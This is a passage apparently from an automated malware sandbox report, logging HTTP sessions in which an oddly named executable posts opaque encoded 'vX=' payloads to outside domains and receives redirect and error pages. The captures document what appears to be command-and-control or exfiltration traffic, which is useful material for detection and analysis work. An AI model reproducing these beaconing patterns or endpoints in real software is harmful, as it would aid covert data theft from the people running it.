51 51 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                            Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_GBCzeUnU5TO+MREERbxCb4copKTT2ACdMEZ0YR6PCQKM4hwE0OK+fQkd1IqsiheKv0gcsYkqHA1LzQsE0kCJQQ==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"> <link rel="preconnect" href="https://www.google
                                                            Jul 3, 2024 17:35:53.523170948 CEST866INData Raw: 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 69 64 3d 22 74 61 72 67 65 74 22 20 73 74 79 6c 65 3d 22 6f 70 61 63 69 74 79 3a 20 30 22 3e 3c 2f 64 69 76 3e 0a 3c 73 63 72 69
                                                            Data Ascii: .com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiODc3NTQxMzUtMjIzYS00NDI3LWI5YzItNDliZjE0OTc1Mjk5IiwicGFnZV90aW1lIjoxNzIwMDIwOTUzLCJwYWdlX3VybCI6Imh0dHA6Ly93d3cub3J0aG9ub3cubGl2ZS9


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            13192.168.11.20497873.33.130.190807100C:\Program Files (x86)\QDDYBUsOSIrUnKhQnRdQSkpzAmPBgXmqwzgPDIagYOtvjhNrDkkLmcM\jFlHFdZgIYNZqR.exe
                                                            TimestampBytes transferredDirectionData
                                                            Jul 3, 2024 17:37:31.398546934 CEST800OUTPOST /3c1k/ HTTP/1.1
                                                            Host: www.musiccitysauce.com
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-US,en;q=0.5
                                                            Accept-Encoding: gzip, deflate, br
                                                            Origin: http://www.musiccitysauce.com
                                                            Referer: http://www.musiccitysauce.com/3c1k/
                                                            Content-Length: 199
                                                            Connection: close
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Cache-Control: max-age=0
                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.59.10 (KHTML, like Gecko) Version/5.1.9 Safari/534.59.10
                                                            Data Raw: 76 58 3d 45 44 48 45 68 33 45 62 72 65 59 59 62 6f 2b 39 75 74 69 30 43 71 4a 6d 31 63 58 70 33 70 68 59 67 4a 46 57 4d 31 77 48 43 64 6b 6a 32 4b 69 76 31 37 79 4d 76 2f 44 55 6d 44 6a 38 6f 39 6f 43 59 73 4e 70 33 52 61 41 4d 44 33 43 77 59 58 44 36 44 6b 50 6b 72 68 6f 44 31 42 42 6a 64 55 4b 39 57 55 75 54 76 33 61 46 6e 4c 56 61 48 68 6b 73 68 69 70 67 2b 67 51 46 43 71 64 6d 42 5a 59 6a 30 6d 58 4b 56 6b 7a 4f 6a 4c 50 4d 37 54 6b 73 74 46 62 31 54 67 36 55 4a 31 68 2f 57 46 50 47 77 4b 4b 61 2b 79 66 5a 36 6e 31 5a 72 53 58 32 77 79 62 62 36 48 36 46 5a 6b 67 49 73 72 63 54 67 3d 3d
                                                            Data Ascii: vX=EDHEh3EbreYYbo+9uti0CqJm1cXp3phYgJFWM1wHCdkj2Kiv17yMv/DUmDj8o9oCYsNp3RaAMD3CwYXD6DkPkrhoD1BBjdUK9WUuTv3aFnLVaHhkshipg+gQFCqdmBZYj0mXKVkzOjLPM7TkstFb1Tg6UJ1h/WFPGwKKa+yfZ6n1ZrSX2wybb6H6FZkgIsrcTg==


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            14192.168.11.20497883.33.130.190807100C:\Program Files (x86)\QDDYBUsOSIrUnKhQnRdQSkpzAmPBgXmqwzgPDIagYOtvjhNrDkkLmcM\jFlHFdZgIYNZqR.exe
                                                            TimestampBytes transferredDirectionData
                                                            Jul 3, 2024 17:37:34.078990936 CEST1140OUTPOST /3c1k/ HTTP/1.1
                                                            Host: www.musiccitysauce.com
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-US,en;q=0.5
                                                            Accept-Encoding: gzip, deflate, br
                                                            Origin: http://www.musiccitysauce.com
                                                            Referer: http://www.musiccitysauce.com/3c1k/
                                                            Content-Length: 539
                                                            Connection: close
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Cache-Control: max-age=0
                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.59.10 (KHTML, like Gecko) Version/5.1.9 Safari/534.59.10
                                                            Data Raw: 76 58 3d 45 44 48 45 68 33 45 62 72 65 59 59 61 4c 6d 39 6f 4d 69 30 4b 71 4a 35 37 38 58 70 69 5a 68 69 67 4a 4a 57 4d 77 51 70 58 2b 4d 6a 33 72 53 76 30 2f 47 4d 71 2f 44 55 2b 7a 6a 31 6c 64 70 41 59 73 42 68 33 52 32 41 4d 48 58 43 78 71 7a 44 2f 7a 6b 49 39 62 68 76 45 31 42 36 31 74 55 58 39 57 59 55 54 75 6a 61 46 58 6e 56 5a 43 39 6b 36 51 69 32 7a 75 67 73 44 43 71 65 73 68 5a 65 6a 30 36 70 4b 51 51 4a 4f 51 58 50 4d 66 6a 6b 74 74 46 63 2f 6a 67 39 62 70 31 76 75 47 49 61 4f 43 65 42 56 38 62 46 58 2f 79 4c 45 4d 69 51 35 79 37 6a 61 5a 4b 44 4b 36 74 65 47 4e 72 52 45 58 32 38 70 41 79 64 78 41 4f 2b 4a 43 42 41 75 2f 45 76 70 46 6c 46 38 36 45 30 74 7a 73 31 59 51 76 32 46 4a 35 55 4c 76 47 33 64 71 2b 59 61 51 4a 2b 39 4a 4a 46 35 6e 35 41 2f 77 66 74 56 4e 48 58 38 78 63 38 66 69 4f 67 4a 59 69 5a 2f 41 6b 57 4d 4e 4c 68 4b 31 2f 66 78 68 4a 32 38 67 70 74 68 55 38 36 35 48 31 4b 70 78 4e 73 6a 36 48 70 79 6b 5a 43 6f 74 61 6d 62 5a 64 42 44 6b 59 75 42 33 74 6b 69 49 6b 73 69 64 6d [TRUNCATED]
                                                            Data Ascii: vX=EDHEh3EbreYYaLm9oMi0KqJ578XpiZhigJJWMwQpX+Mj3rSv0/GMq/DU+zj1ldpAYsBh3R2AMHXCxqzD/zkI9bhvE1B61tUX9WYUTujaFXnVZC9k6Qi2zugsDCqeshZej06pKQQJOQXPMfjkttFc/jg9bp1vuGIaOCeBV8bFX/yLEMiQ5y7jaZKDK6teGNrREX28pAydxAO+JCBAu/EvpFlF86E0tzs1YQv2FJ5ULvG3dq+YaQJ+9JJF5n5A/wftVNHX8xc8fiOgJYiZ/AkWMNLhK1/fxhJ28gpthU865H1KpxNsj6HpykZCotambZdBDkYuB3tkiIksidmtoSL+JHnZk4hTngfag4cZJfjaopvPQK4dLIYqa+1tnm0+g7IAAtTpz7J5TaYnW4zN86mhgfhQBXM3bQycVxbhDzCFfIhcUxjHNa6Z1zpnKlOgIcvHdFP2XLYBY5jdD5Ddi1DZG3NUYZpCI9xU9+hzFdYT2BYRMy4rwetqLadnGq4hdoV9ernT3CMUxS4bJtIkBLdALqk=


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            15192.168.11.20497893.33.130.190807100C:\Program Files (x86)\QDDYBUsOSIrUnKhQnRdQSkpzAmPBgXmqwzgPDIagYOtvjhNrDkkLmcM\jFlHFdZgIYNZqR.exe
                                                            TimestampBytes transferredDirectionData
                                                            Jul 3, 2024 17:37:36.751774073 CEST6445OUTPOST /3c1k/ HTTP/1.1
                                                            Host: www.musiccitysauce.com
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-US,en;q=0.5
                                                            Accept-Encoding: gzip, deflate, br
                                                            Origin: http://www.musiccitysauce.com
                                                            Referer: http://www.musiccitysauce.com/3c1k/
                                                            Content-Length: 52927
                                                            Connection: close
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Cache-Control: max-age=0
                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.59.10 (KHTML, like Gecko) Version/5.1.9 Safari/534.59.10
                                                            Data Raw: 76 58 3d 45 44 48 45 68 33 45 62 72 65 59 59 61 4c 6d 39 6f 4d 69 30 4b 71 4a 35 37 38 58 70 69 5a 68 69 67 4a 4a 57 4d 77 51 70 58 2b 55 6a 33 64 47 76 31 65 47 4d 70 2f 44 55 67 44 6a 34 6c 64 6f 59 59 73 5a 6c 33 52 71 32 4d 46 76 43 32 35 4c 44 34 46 49 49 36 62 68 75 4c 56 42 43 6a 64 56 41 39 57 56 4f 54 75 33 73 46 6e 6a 56 61 43 4e 6b 6f 7a 36 70 37 65 67 51 44 43 71 53 37 52 59 6a 6a 30 75 35 4b 51 4d 4a 4f 54 7a 50 4d 75 66 6b 76 2b 74 63 6c 44 67 2b 53 4a 30 2b 33 57 49 52 4f 45 7a 36 56 38 61 77 58 36 53 4c 45 4c 65 51 34 78 44 69 61 35 4b 44 4a 36 74 52 43 4e 6d 57 45 58 71 6b 70 41 71 64 78 44 2b 2b 4a 69 42 41 6c 38 63 73 35 31 6c 48 76 71 45 5a 70 7a 68 5a 59 51 37 69 46 4c 31 55 65 4d 36 33 64 5a 47 59 66 31 39 2b 7a 4a 4a 48 6b 33 35 74 78 51 65 79 56 4e 58 74 38 79 55 4b 66 69 71 67 62 4a 43 5a 76 78 6b 52 59 64 4c 6a 41 56 2b 64 67 52 46 36 38 67 35 78 68 55 39 33 35 46 5a 4b 70 6c 78 73 69 37 48 6d 31 30 5a 46 78 39 61 4a 4f 70 52 4c 44 6e 38 32 42 33 46 30 69 4c 49 73 34 39 6d [TRUNCATED]
                                                            Data Ascii: vX=EDHEh3EbreYYaLm9oMi0KqJ578XpiZhigJJWMwQpX+Uj3dGv1eGMp/DUgDj4ldoYYsZl3Rq2MFvC25LD4FII6bhuLVBCjdVA9WVOTu3sFnjVaCNkoz6p7egQDCqS7RYjj0u5KQMJOTzPMufkv+tclDg+SJ0+3WIROEz6V8awX6SLELeQ4xDia5KDJ6tRCNmWEXqkpAqdxD++JiBAl8cs51lHvqEZpzhZYQ7iFL1UeM63dZGYf19+zJJHk35txQeyVNXt8yUKfiqgbJCZvxkRYdLjAV+dgRF68g5xhU935FZKplxsi7Hm10ZFx9aJOpRLDn82B3F0iLIs49mt4hT5B3nepYhB4QfNg4hyJdPkodnPW6odaoYrMu1ThW00k7IAAtOYz7F5TPsnWP3NqZOhmfhWBXNxbQvsVxDDDyS7fKtcUE/HOb6WlzpuOlP4Q8zQdFS7XLp6fJPdRtjdzFDWDXNTbZoZCt9Y9+UGFdE52BwRIkUorOpJcbBoCpMBXZJNT8r2wT956nsOWu8OcJ9gPtQAMvTkbrTN5fvRUGbNH19r/kmdmFiojPEFC1kwEHBn8/248u+S9U0kqNuaT+DC1qKXWRio2QQWIhaLjoDsy3SKSBJUXH4Ht7RYaqAYdtjxTVl73QCfAyNN0KlP/UKE3QgZbqhfzzIhpxRt18D8IRoEiwKz4RtjS3C1ijBBH3LUECIInKZEGPP8ZlsRDd71PlBuQ5Flznl6hsBE+gSRbprwMvvzcu4wXpbjWpAyKVUDMm4YFTjwlHa326RgWmrzPBNhKh5PrwecaFPZoyoaX8QSx5rrN7XN/Pq79vh4Tb40jLNZV3Ddw5igWKqR4Wn6Ndg7byWQPRhmI9V6IYd9GfrlmvsiDq6axFQ/ZNd9THr7+Nb4tbO3Mjco97W+373iEeHZORs4f27JM/ji8CrRgn0R+CEK/Xr5rGvXCO2+fcjd5KWMgs3/9o+Mugnqn8q7s36Vl7MnmlSFMxKCofJdjJmrpzOi1 [TRUNCATED]
                                                            Jul 3, 2024 17:37:36.751853943 CEST6445OUTData Raw: 2b 77 70 6e 76 68 6b 52 4d 66 66 75 6d 55 4c 4a 4e 64 33 43 35 56 4b 69 78 57 5a 33 48 39 58 78 36 58 49 54 4e 49 4f 51 43 33 51 58 48 78 50 35 76 73 55 59 37 58 46 74 2f 4b 32 56 63 32 76 6e 71 61 44 4f 45 66 46 36 73 65 4a 67 53 44 6b 71 75 65
                                                            Data Ascii: +wpnvhkRMffumULJNd3C5VKixWZ3H9Xx6XITNIOQC3QXHxP5vsUY7XFt/K2Vc2vnqaDOEfF6seJgSDkqueIH2Y/dr6142ZkXNW11V1ntvQveFHDiJDZ1xBQhViI7rtvVpzFjws1AZLx1xf7b5ZLie1KzryIO6noUKQbqojglqsaLl+wvH4LMPsg+CwF/Zwug60L/xz/MPAB59m3P7uM4UW1sadynHNT1S/V0Ijj84Ee9+0aK0MH
                                                            Jul 3, 2024 17:37:36.871010065 CEST2578OUTData Raw: 4c 66 45 72 53 4b 33 6a 6d 52 54 41 45 77 6f 78 7a 6e 2f 49 4d 66 46 4a 6d 2f 4e 6f 54 74 49 50 5a 5a 46 47 52 4c 2b 31 71 4c 62 6c 50 37 4b 33 52 46 7a 32 52 46 36 67 74 46 39 79 61 6e 6f 37 51 67 52 68 2f 49 6a 55 45 50 31 55 6e 54 7a 44 64 43
                                                            Data Ascii: LfErSK3jmRTAEwoxzn/IMfFJm/NoTtIPZZFGRL+1qLblP7K3RFz2RF6gtF9yano7QgRh/IjUEP1UnTzDdCX5+HXu4DooxV3cn/g6jFW93N/J1XeqyqMED9BNWLA2Y8WtJGFRZc+ji/NHo+mNbxtZFi3/P6mbganEs7zktUxSz8s4E5MB0P9uUHHJINHGaWj5UgNvrcbeMq09Bp+C4skxtoNwujy5dm8a7dgaaaJwomey+5nwuVl
                                                            Jul 3, 2024 17:37:36.871144056 CEST7734OUTData Raw: 56 31 6c 70 42 7a 4a 7a 6f 4a 5a 51 6a 75 2b 31 54 30 69 52 65 34 4b 61 76 55 59 64 43 42 56 4e 55 37 70 72 33 57 46 4f 72 46 41 47 33 57 43 2f 57 41 6d 49 44 69 61 4f 46 48 74 45 76 2b 4d 72 72 64 6a 6a 6f 4e 31 53 4d 58 4a 6a 34 66 61 52 57 75
                                                            Data Ascii: V1lpBzJzoJZQju+1T0iRe4KavUYdCBVNU7pr3WFOrFAG3WC/WAmIDiaOFHtEv+MrrdjjoN1SMXJj4faRWulG/YDfWDketrMdkPdFIRgIstvnJVa/zlmTD/SxCjq7Qr+2tXK5EBj0zrsRebvtLBWVF7e2lCwS2eHVdEs+SU+BIirPswBlmUqZj1yB29IfuqS92Lhm+1IYLqWJaxB21YUs1uPkCeLqus8Ps5oRasEOwJhKDAn5PXI
                                                            Jul 3, 2024 17:37:36.871351957 CEST3867OUTData Raw: 58 6b 38 62 53 65 4c 45 4f 6a 4e 64 35 42 6f 37 77 54 58 70 6f 5a 70 35 6a 4b 4c 58 5a 36 76 6c 63 75 45 32 73 72 5a 67 63 70 77 6e 64 55 67 4b 55 37 47 65 59 4c 70 57 5a 67 67 42 48 51 4e 65 34 74 79 49 71 46 4a 73 51 73 46 59 4a 41 70 55 42 6c
                                                            Data Ascii: Xk8bSeLEOjNd5Bo7wTXpoZp5jKLXZ6vlcuE2srZgcpwndUgKU7GeYLpWZggBHQNe4tyIqFJsQsFYJApUBlfDh/OYAatKqgDLOBQzPIFDTvoSOHH25t7ae7lBGA11bzoJiLZRDeDbAS8QOiDIe6T1b3/MyQP8RSj6BTLVRDkDggSYb5RhqLuYDhAfgxYw8W8wg215r3511YVJ/0VwYii8f2EMJFBP3+DZcuGR8eItLZDXODRDvGu
                                                            Jul 3, 2024 17:37:36.871527910 CEST6445OUTData Raw: 6a 33 32 62 4c 47 6a 67 42 6b 58 52 56 69 2f 72 69 31 36 42 36 5a 74 64 69 43 34 6a 31 6e 48 6b 4a 59 33 54 36 31 72 53 65 54 31 31 49 6b 57 58 45 61 73 6e 34 58 4d 54 35 33 35 4a 58 4a 4b 6b 66 36 46 53 55 34 71 68 44 6f 6e 36 31 42 50 64 31 54
                                                            Data Ascii: j32bLGjgBkXRVi/ri16B6ZtdiC4j1nHkJY3T61rSeT11IkWXEasn4XMT535JXJKkf6FSU4qhDon61BPd1TdElhAotl6W5u93rnpKkIuFscolTTFfm7vzSc1q4fTiKjabF33MYU9soiCbMVdXXGlyBzQeJhNKPRc7njiEy4NGtV81neY8hVUvoVP0FfzRcCfjRmPqB9jgP2zu/TZ1SxwdUxWk6UntSSlRHth6etzODn8jSL9ZFWG
                                                            Jul 3, 2024 17:37:36.871701002 CEST5156OUTData Raw: 49 49 4b 73 34 59 61 69 5a 6b 54 32 69 50 64 73 51 65 43 55 7a 4b 6b 6e 56 50 2f 42 63 67 69 58 6b 42 31 33 4e 6c 65 47 61 4b 2f 44 47 52 6f 66 46 2f 78 70 5a 74 67 44 44 36 6a 66 6b 77 49 5a 43 51 57 39 4b 58 57 45 2f 53 37 4d 32 75 61 77 4a 72
                                                            Data Ascii: IIKs4YaiZkT2iPdsQeCUzKknVP/BcgiXkB13NleGaK/DGRofF/xpZtgDD6jfkwIZCQW9KXWE/S7M2uawJrSdXE+J9nkKpvOFKZdLzj99v7lGh5ZqcwhOvA/vJL/V7ciEdpStOqwVckLo5LnrWUn3k0PJVHbpnm68Q8N5Hmqe5Jr6IjfkEuOc8QLPJS2LQ4k04bBR4c8nj3iRDHJslLrevZjGUZe/ohj8k5il5sytW/LBjziH8ZU
                                                            Jul 3, 2024 17:37:36.989980936 CEST2578OUTData Raw: 55 44 64 53 72 37 65 4a 65 30 68 53 61 4a 59 63 68 73 78 34 7a 62 51 6c 68 55 42 31 55 66 7a 55 34 69 78 4c 75 43 49 69 56 4b 5a 35 58 7a 41 77 45 33 4c 4d 34 73 52 61 72 4b 62 6b 36 70 6a 4c 4f 35 70 4a 76 36 64 66 68 65 30 31 6f 51 46 37 41 76
                                                            Data Ascii: UDdSr7eJe0hSaJYchsx4zbQlhUB1UfzU4ixLuCIiVKZ5XzAwE3LM4sRarKbk6pjLO5pJv6dfhe01oQF7Avfv2k04EVmGIS6f2sagUQF4cgQ3UdxHq0TeAY0uhL+7r/aupEwfNnXBNbwCimFGY5cl7rF5QS29B/RLhKdBTmc4kKq/DoiG4i2pl81XMjSdpSpcgEtRrFJifQY+BC9eYoElMbRkLmy2NbcSLba404o31xPts43eAGm
                                                            Jul 3, 2024 17:37:36.990248919 CEST2578OUTData Raw: 6a 6c 39 6a 44 32 31 33 4b 56 30 6a 52 55 7a 33 32 53 6b 6e 34 41 31 53 64 51 4f 51 74 6c 53 36 6f 37 52 6d 62 55 58 33 52 4e 6d 41 4e 58 45 39 7a 52 61 79 55 44 76 78 69 72 55 6c 61 46 6b 69 5a 74 5a 4c 55 62 56 42 6d 4b 65 4c 5a 6a 35 6d 53 46
                                                            Data Ascii: jl9jD213KV0jRUz32Skn4A1SdQOQtlS6o7RmbUX3RNmANXE9zRayUDvxirUlaFkiZtZLUbVBmKeLZj5mSFYTPF2yqLZDrsCgYWi+DdOtuLmedT2NKP+fW30/LZEy5LZoLwVxCzKrdReH19ydRpTh3RKkdd4WhfUmTvSrcrl2j/k9idkLwCFwN3xj2eTD8ns8RY0JUiXh3Kvu0qFfubB++TTsp3azmalwsBzEmOrD0HRu6d5yMFY
                                                            Jul 3, 2024 17:37:36.990416050 CEST2578OUTData Raw: 79 50 50 6a 46 57 63 67 31 42 45 6a 65 30 62 42 4d 41 4c 44 44 4c 30 4e 6a 32 2f 5a 79 35 70 75 73 48 79 65 41 72 50 37 37 69 59 35 34 2b 6c 78 4b 6f 6f 4e 38 6e 78 35 39 31 44 62 4c 72 4e 55 38 63 54 4e 50 43 33 69 76 74 65 6d 44 50 30 38 30 77
                                                            Data Ascii: yPPjFWcg1BEje0bBMALDDL0Nj2/Zy5pusHyeArP77iY54+lxKooN8nx591DbLrNU8cTNPC3ivtemDP080wSYtEF1EXmwkIHnwcczemQ0ToutraX9xx326kbDwjc6dKchCJWVJ+30uvFPuqDKUzLB3kC4HSHEEpqvCHE0h+vhWpsbfpqo4g79HCEsSa4N4FBFVtFdsQaVJd6O3F1BdZuG5dd9+fbCPidIcTRv44o8OmSmjVPPGR/
                                                            Jul 3, 2024 17:37:36.990586996 CEST7129OUTData Raw: 38 2b 50 69 5a 41 30 4b 71 54 33 72 37 72 5a 38 58 33 34 4a 43 43 68 51 75 68 70 45 59 56 75 6f 75 48 72 54 49 6c 64 33 79 69 4b 62 4a 69 64 56 33 37 72 4d 77 32 79 58 6c 30 42 43 7a 46 62 6f 4c 49 38 69 30 76 32 46 77 71 58 38 4f 37 71 34 30 75
                                                            Data Ascii: 8+PiZA0KqT3r7rZ8X34JCChQuhpEYVuouHrTIld3yiKbJidV37rMw2yXl0BCzFboLI8i0v2FwqX8O7q40uingsK2/oLD+5hxUSrb+UDRHxHo2aK1S9q47tCsQI/b6HZG2++QzCvPLQAATC4k6AeJlkuAY9dHzIIRu8lRjGOiWvboHJX8Wausy9AJWZqxMwHCjqHqx5RpgJ7nRG6qyWiCJUMIr7/yLnBAJkSInVDoxwJmS0OECPj


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            16192.168.11.20497903.33.130.190807100C:\Program Files (x86)\QDDYBUsOSIrUnKhQnRdQSkpzAmPBgXmqwzgPDIagYOtvjhNrDkkLmcM\jFlHFdZgIYNZqR.exe
                                                            TimestampBytes transferredDirectionData
                                                            Jul 3, 2024 17:37:39.419517040 CEST526OUTGET /3c1k/?vX=JBvkiC5/p5M0KduSv9nMAq1L7Ov9kIxy2ulrSw8DAMQ+oYrb/Oqt+Mz9qyL7kOgxOchk71vbEF/036GwyUgS8aFzNiZYrtFOzFZSCs3+FXjpDA1Q93DrzfE=&_B7=LxyxWrj8kri0gh HTTP/1.1
                                                            Host: www.musiccitysauce.com
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-US,en;q=0.5
                                                            Connection: close
                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.59.10 (KHTML, like Gecko) Version/5.1.9 Safari/534.59.10
                                                            Jul 3, 2024 17:37:39.561814070 CEST397INHTTP/1.1 200 OK
                                                            Server: openresty
                                                            Date: Wed, 03 Jul 2024 15:37:39 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 257
                                                            Connection: close
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 76 58 3d 4a 42 76 6b 69 43 35 2f 70 35 4d 30 4b 64 75 53 76 39 6e 4d 41 71 31 4c 37 4f 76 39 6b 49 78 79 32 75 6c 72 53 77 38 44 41 4d 51 2b 6f 59 72 62 2f 4f 71 74 2b 4d 7a 39 71 79 4c 37 6b 4f 67 78 4f 63 68 6b 37 31 76 62 45 46 2f 30 33 36 47 77 79 55 67 53 38 61 46 7a 4e 69 5a 59 72 74 46 4f 7a 46 5a 53 43 73 33 2b 46 58 6a 70 44 41 31 51 39 33 44 72 7a 66 45 3d 26 5f 42 37 3d 4c 78 79 78 57 72 6a 38 6b 72 69 30 67 68 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                            Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?vX=JBvkiC5/p5M0KduSv9nMAq1L7Ov9kIxy2ulrSw8DAMQ+oYrb/Oqt+Mz9qyL7kOgxOchk71vbEF/036GwyUgS8aFzNiZYrtFOzFZSCs3+FXjpDA1Q93DrzfE=&_B7=LxyxWrj8kri0gh"}</script></head></html>


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            17192.168.11.204979166.235.200.145807100C:\Program Files (x86)\QDDYBUsOSIrUnKhQnRdQSkpzAmPBgXmqwzgPDIagYOtvjhNrDkkLmcM\jFlHFdZgIYNZqR.exe
                                                            TimestampBytes transferredDirectionData
                                                            Jul 3, 2024 17:37:44.983409882 CEST806OUTPOST /bjbg/ HTTP/1.1
                                                            Host: www.lakemontbellevue.com
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-US,en;q=0.5
                                                            Accept-Encoding: gzip, deflate, br
                                                            Origin: http://www.lakemontbellevue.com
                                                            Referer: http://www.lakemontbellevue.com/bjbg/
                                                            Content-Length: 199
                                                            Connection: close
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Cache-Control: max-age=0
                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.59.10 (KHTML, like Gecko) Version/5.1.9 Safari/534.59.10
                                                            Data Raw: 76 58 3d 43 59 73 6c 6f 57 45 64 6f 62 4a 57 74 61 76 78 51 56 30 33 42 49 62 4d 76 6c 4e 66 34 4d 35 70 64 72 38 71 6b 65 42 37 5a 4b 79 6a 67 62 44 35 6f 31 56 68 32 61 57 2f 70 70 6b 52 4e 47 73 32 49 4c 38 37 51 36 4d 36 38 36 4b 71 5a 6c 46 79 51 5a 4e 47 51 38 62 4d 39 66 79 43 64 57 4f 32 6c 6f 2f 57 4e 38 4b 51 78 34 6f 59 7a 73 44 38 73 4f 4c 55 51 44 50 37 33 48 47 70 6b 45 61 52 45 65 48 30 45 30 38 6f 46 32 4c 49 69 2b 4e 72 70 38 53 43 6d 6d 48 5a 69 46 31 79 48 4d 62 72 36 2b 68 4a 2b 67 4c 6e 4a 38 37 4c 73 53 42 4d 78 76 55 4d 50 2b 30 6b 6b 34 6b 6e 75 66 4d 7a 69 41 3d 3d
                                                            Data Ascii: vX=CYsloWEdobJWtavxQV03BIbMvlNf4M5pdr8qkeB7ZKyjgbD5o1Vh2aW/ppkRNGs2IL87Q6M686KqZlFyQZNGQ8bM9fyCdWO2lo/WN8KQx4oYzsD8sOLUQDP73HGpkEaREeH0E08oF2LIi+Nrp8SCmmHZiF1yHMbr6+hJ+gLnJ87LsSBMxvUMP+0kk4knufMziA==
                                                            Jul 3, 2024 17:37:45.422059059 CEST1289INHTTP/1.1 404 Not Found
                                                            Date: Wed, 03 Jul 2024 15:37:45 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                            Cache-Control: no-cache, must-revalidate, max-age=0
                                                            Link: <https://lakemontbellevue.net/wp-json/>; rel="https://api.w.org/"
                                                            Vary: Accept-Encoding
                                                            host-header: c2hhcmVkLmJsdWVob3N0LmNvbQ==
                                                            X-Newfold-Cache-Level: 2
                                                            X-Endurance-Cache-Level: 2
                                                            X-nginx-cache: WordPress
                                                            CF-Cache-Status: DYNAMIC
                                                            Set-Cookie: _cfuvid=J8TlPgwK.uyiwfHuPH9woqnGDB4R0kvbtowxQTqFaig-1720021065357-0.0.1.1-604800000; path=/; domain=.www.lakemontbellevue.com; HttpOnly
                                                            Server: cloudflare
                                                            CF-RAY: 89d7f5687c802ca3-ORD
                                                            Content-Encoding: gzip
